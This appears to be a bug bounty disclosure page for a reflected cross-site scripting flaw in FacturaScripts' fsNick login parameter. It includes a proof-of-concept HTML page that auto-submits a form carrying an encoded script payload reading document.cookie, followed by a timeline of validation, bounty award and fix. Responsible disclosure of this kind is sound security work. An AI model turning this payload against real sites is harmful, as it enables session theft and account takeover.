Refelect XSS in facturascripts in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

facturascripts is vulnerable to XSS in fsNick parameter

Proof of Concept

save this code as poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/" method="POST">
      <input type="hidden" name="fsNick" value="1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="fsPassword" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

open file with your browser -> xss trigger

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
minhnb has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 73a659 a month ago
The fix bounty has been dropped
to join this conversation